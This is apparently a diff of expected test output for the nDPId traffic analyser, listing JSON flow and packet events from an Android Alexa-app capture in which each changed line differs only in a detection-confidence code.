00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1490976027621,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976027621,"pkt":"AMDKkaPvePiC0\/vCCABFAAA01nVAAEAG\/+asECrYrcLfvKd+FGxeQZ9hjuF01oAQAVeX1wAAAQEICgD2SRkr\/EXW"} -01096{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027567,"flow_last_seen":1490976027625,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976027625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976027567,"flow_last_seen":1490976027674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1490976027674,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} +01096{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027567,"flow_last_seen":1490976027625,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976027625,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01158{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976027567,"flow_last_seen":1490976027674,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1490976027674,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"a5a59633017c3d696d2c69350e5fc004","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027724,"flow_last_seen":1490976027724,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1490976027724,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027724,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Wk1AAEARM2qsECrYrBAqASjeADUAKB2sfT0BAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027724,"flow_last_seen":1490976027724,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027724,"flow_last_seen":1490976027724,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976027724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1490976027725,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1490976027725,"pkt":"ePiC0\/vCAMDKkaPvCABFAABM0NhAAEARvM6sECoBrBAq2AA1KN4AOCjyfT2BgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAAEGAATYOtrE"} -00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":39,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976027725,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}} +00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":39,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976027725,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.218.196"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027733,"flow_last_seen":1490976027733,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976027733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1490976027733,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027733,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8c0BAAEAGOiysECrYrNkJjorUAFAegTplAAAAAKAC\/\/+MiQAAAgQFtAQCCAoA9kklAAAAAAEDAwg="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1490976027741,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1490976027741,"pkt":"MzMAAAACePiC0\/vCht1gAAAAABA6\/\/6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAChQCMEAAAAAABAXj4gtP7wg=="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1490976027776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027776,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8g+MAADQGdYms2QmOrBAq2ABQitTVYWKuHoE6ZqASpahLiwAAAgQFZAQCCApVvw3GAPZJJQEDAwc="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1490976027777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976027777,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c0FAAEAGOjOsECrYrNkJjorUAFAegTpm1WFir4AQAVceVQAAAQEICgD2SSlVvw3G"} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027733,"flow_last_seen":1490976027780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976027780,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027733,"flow_last_seen":1490976027780,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976027780,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027958,"flow_last_seen":1490976027958,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976027958,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1490976027958,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1490976027958,"pkt":"ePiC0\/vCAMDKkaPvCABFwABQaiwAAEABYsesECoBrBAq2AUBiVKsECoqRQAANNZ6QAA\/BgDirBAq2K3C37ynfhRsXkGjCY7hdlaAEAFbkZsAAAEBCAoA9kk7K\/xGxA=="} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027958,"flow_last_seen":1490976027958,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976027958,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.192626} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027958,"flow_last_seen":1490976027958,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976027958,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.192626} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029184,"flow_last_seen":1490976029184,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976029184,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1490976029184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029184,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Wk5AAEARM2msECrYrBAqAbwbADUAKEUyqIoBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029184,"flow_last_seen":1490976029184,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976029184,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029184,"flow_last_seen":1490976029184,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976029184,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1490976029244,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976029244,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC90PZAAEARvD+sECoBrBAq2AA1vBsAqWPAqIqBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAAToAAoDd3d3A2NkbsAQwCwABQABAAAABgAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAQABDRV0cXAQgABAAEAAAAEAAQ0VdGPwEIAAQABAAAABAAENFXR2MBCAAEAAQAAAAQABDRV0Xo="} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976029244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.197"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976029244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.197"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029248,"flow_last_seen":1490976029248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976029248,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1490976029248,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029248,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8xDtAAEAGmX2sECrYNFXRxdfKAbvTso2HAAAAAKAC\/\/\/liQAAAgQFtAQCCAoA9km8AAAAAAEDAwg="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1490976029325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029325,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqrg0VdHFrBAq2AG718qLhBMS07KNiKAScSCB1QAAAgQFtAQCCAptCebiAPZJvAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1490976029328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976029328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xDxAAEAGmYSsECrYNFXRxdfKAbvTso2Ii4QTE4AQAVcgZAAAAQEICgD2ScRtCebi"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029248,"flow_last_seen":1490976029341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976029341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1669,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3691,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 